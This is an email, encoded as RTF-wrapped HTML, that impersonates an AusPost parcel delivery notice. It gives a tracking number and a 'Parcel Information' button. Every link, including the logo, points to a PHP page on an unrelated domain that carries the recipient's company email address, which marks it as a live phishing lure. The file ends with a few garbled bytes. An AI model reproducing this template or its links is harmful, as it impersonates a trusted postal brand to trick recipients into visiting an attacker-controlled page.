{\rtf1\ansi\ansicpg1252\fromhtml1 \fbidis \deff0{\fonttbl
{\f0\fswiss Arial;}
{\f1\fmodern Courier New;}
{\f2\fnil\fcharset2 Symbol;}
{\f3\fmodern\fcharset0 Courier New;}}
{\colortbl\red0\green0\blue0;\red0\green0\blue255;\red255\green255\blue255;\red248\green248\blue248;}
\uc1\pard\plain\deftab360 \f0\fs24 
{\*\htmltag19 <html>}
{\*\htmltag2 \par }
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag2 \par }
{\*\htmltag50 <body bgcolor="#FFFFFF" text="#000000">}\htmlrtf \viewkind5
{\*\background {\shp{\*\shpinst{\sp{\sn fillColor}{\sv 16777215}}{\sp{\sn fFilled}{\sv 1}}}}}\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab }
{\*\htmltag96 <table width="741" style="background-color:#f3f1ee;">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab }
{\*\htmltag148 <td style="padding:8px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab }\htmlrtf }\htmlrtf0 \htmlrtf}\htmlrtf0

{\*\htmltag64 <h3 style="font-size:18pt;color:#dc1928;">}\htmlrtf {\fs28 \par\b \htmlrtf0 \htmlrtf {\htmlrtf0 \htmlrtf {\fs28 \htmlrtf0 
{\*\htmltag84 <img moz-do-not-send="true"\par  src="http://thebestfs.com/61wt3/FCRaogTMD1b5WVE.png" alt="AusPost">}\htmlrtf  {\field{\*\fldinst{HYPERLINK "http://thebestfs.com/61wt3/FCRaogTMD1b5WVE.png"}}{\fldrslt\cf1\ul {\chbrdr\brdrsh AusPost}}}\htmlrtf0 \htmlrtf }\htmlrtf0 \htmlrtf\par}\htmlrtf0
\htmlrtf \par }\htmlrtf0 
{\*\htmltag72 </h3>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab }
{\*\htmltag248 </td>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag64 <tr height="5" bgcolor="#ffffff">}\htmlrtf {\htmlrtf0 \htmlrtf \highlight2 \htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab }
{\*\htmltag148 <td style="padding:12px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab }\htmlrtf }\htmlrtf0 \htmlrtf}\htmlrtf0

{\*\htmltag96 <table width="329" style="padding:7px;" bgcolor="#F8F8F8" align="left">}\htmlrtf {\pard\plain \f0\fs24 \highlight3 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab \tab }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab \tab \tab }
{\*\htmltag148 <td style="padding: 4px;">}\htmlrtf {\htmlrtf0 Number of parcels:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84 \tab \tab \tab \tab \tab \tab }
{\*\htmltag148 <td style="padding: 4px;">}\htmlrtf {\htmlrtf0 1
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84 \tab \tab \tab \tab \tab }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab \tab }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab \tab \tab }
{\*\htmltag148 <td width="161" style="padding: 4px;">}\htmlrtf {\htmlrtf0 Tracking Number:
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84 \tab \tab \tab \tab \tab \tab }
{\*\htmltag148 <td style="padding: 4px;">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab \tab \tab \tab }
{\*\htmltag84 <a\par  href="http://thebestfs.com/61wt3/3gbqMlDd4mI.php?id=accountspayable@retprogroup.com.au"\par  target="_blank">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://thebestfs.com/61wt3/3gbqMlDd4mI.php?id=accountspayable@retprogroup.com.au" \\n}}{\fldrslt\cf1\ul \htmlrtf0 99869301423\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84 \tab \tab \tab \tab \tab \tab }
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab \tab }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab }
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab }
{\*\htmltag112 <br>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag112 <br/>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab }
{\*\htmltag64 <p style="text-align: center; margin:9px;">}\htmlrtf \par
\htmlrtf0 \htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab \tab \tab }
{\*\htmltag84 <a\par  href="http://thebestfs.com/61wt3/3gbqMlDd4mI.php?id=accountspayable@retprogroup.com.au"\par  target="_blank" style="background: #dc1928; padding:14px;\par  font-size:20px;color:#ffffff;">}\htmlrtf {\field{\*\fldinst{HYPERLINK "http://thebestfs.com/61wt3/3gbqMlDd4mI.php?id=accountspayable@retprogroup.com.au" \\n}}{\fldrslt\cf1\ul \htmlrtf0 Parcel Information\htmlrtf }\htmlrtf0 \htmlrtf }\htmlrtf0 
{\*\htmltag92 </a>}
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84 \tab \tab \tab \tab }\htmlrtf\par}\htmlrtf0
\htmlrtf \par
\htmlrtf0 
{\*\htmltag72 </p>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab \tab }
{\*\htmltag112 <br/>}\htmlrtf \par
\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab \tab }
{\*\htmltag248 </td>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab \tab }
{\*\htmltag64 <tr height="3" style="background-color:#ffffff;">}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab \tab }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84 \tab \tab }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag240 \tab }
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag58 </body>}
{\*\htmltag2 \par }
{\*\htmltag27 </html>}
{\*\htmltag3 \par }
{\*\htmltag3 \par }}0t‘l1\3
wa